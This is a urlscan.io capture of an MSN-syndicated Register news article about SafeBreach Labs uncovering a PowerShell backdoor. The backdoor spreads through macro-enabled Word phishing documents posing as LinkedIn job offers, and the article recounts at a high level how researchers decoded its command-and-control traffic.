www.msn.com
Open in
urlscan Pro
204.79.197.203
Public Scan
URL:
https://www.msn.com/en-us/news/technology/fully-undetectable-windows-backdoor-gets-detected/ar-AA136Pig?ocid=entnews...
Submission: On October 26 via manual from MX — Scanned from DE
Submission: On October 26 via manual from MX — Scanned from DE
Form analysis
0 forms found in the DOMText Content
React 15 Comments| 68 SAFEBREACH SUPPOSEDLY SPOTS SOMEWHAT STEALTHY SUBVERSIVE SOFTWARE SafeBreach Labs says it has detected a novel fully undetectable (FUD) PowerShell backdoor, which calls into question the accuracy of threat naming.… More significantly, the malware may backdoor your Windows system by masquerading as part of the update process. Tomer Bar, director of security research at SafeBreach, explains in an advisory that the software nasty and associated command-and-control (C2) backend appear to have been developed by a competent unknown miscreant – though one not savvy enough to avoid mistakes that allowed SafeBreach researchers to figure out what was going on, natch. "The attack starts with a malicious Word document, which includes a macro that launches an unknown PowerShell script," said Bar. "The name of the Word document is 'Apply Form[.]docm.'" According to Bar, the malicious Word document was uploaded from Jordan on August 25, 2022. The file appears to have been part of a phishing campaign designed to look like a LinkedIn-based job offer, in order to entice victims to open it. The mark would have to allow the macro in the Word document to run for an infection to be successful. Asked to provide more details, a SafeBreach spokesperson said, "We don't have additional information about the targets, but we believe that this is a sophisticated targeted attack, possibly related to the phishing attempts targeted at job seekers." About 100 victims are said to have been affected. "The macro drops updater.vbs, creates a scheduled task pretending to be part of a Windows update, which will execute the updater.vbs script from a fake update folder under '%appdata%\local\Microsoft\Windows," explained Bar. The updater.vbs script then runs a PowerShell script that opens a remote-control backdoor on the box. According to Bar, prior to executing the scheduled task, the malware creates two PowerShell scripts, Script.ps1 and Temp.ps1. Their content gets obfuscated and stored in text boxes within the Word file and gets saved to the fake update directory. As such, the scripts don't get detected in VirusTotal. Script.ps1 calls out to the C2 server to assign a victim ID number and to fetch commands to execute. It runs the Temp.ps1 script, which will store information or execute PowerShell commands depending on the parameters passed by the initial script. According to Bar, the attacker messed up by issuing victim identifiers in a predictable sequence. This allowed the security researchers to develop a script that presented each victim's identifier to the backend system, so they could record the interactions with the C2 server in a packet capture. Thereafter they were able to use a second tool to extract the encrypted commands from the captured packets and decipher what the malware was doing. Microsoft recently changed the default behavior of Office apps to block macros in files downloaded from the internet, something previously possible through a Trust Center policy. We asked SafeBreach whether this might offer any protection. "Yes, if macros are disabled, this attack vector won't work," a spokesperson said. "But if the threat actor uses a different attack vector (exploits for example instead of macros), the FUD PowerShell malware would work and spy on the victim." ® Microsoft may earn an Affiliate Commission if you purchase something through recommended links in this article. Continue reading Join the conversation 15 -------------------------------------------------------------------------------- Sponsored Content MORE FROM The Register Google Alphabet reviewing every project after $6bn decline in profitsChip shortages still dog carmakers despite weaker semiconductor demandShutterstock partners with OpenAI to sell AI-generated stock images using DALL-E Visit The Register TRENDING STORIES 1. Ukraine Situation Report: Russia's Ka-52 Attack Helicopter Fleet Has Been MassacredThe Drive 2. Woodward responds to Trump claim that he released tapes without permissionWashington Examiner 3. NOPD: 1 arrested in connection with viral video of guns being fired off on interstateWDSU New Orleans 4. 4-alarm fire at Sugar House construction site forces hundreds nearby to evacuateKUTV Salt Lake City MORE FOR YOU * © 2022 Microsoft * Privacy & Cookies * Terms of use * Advertise Feedback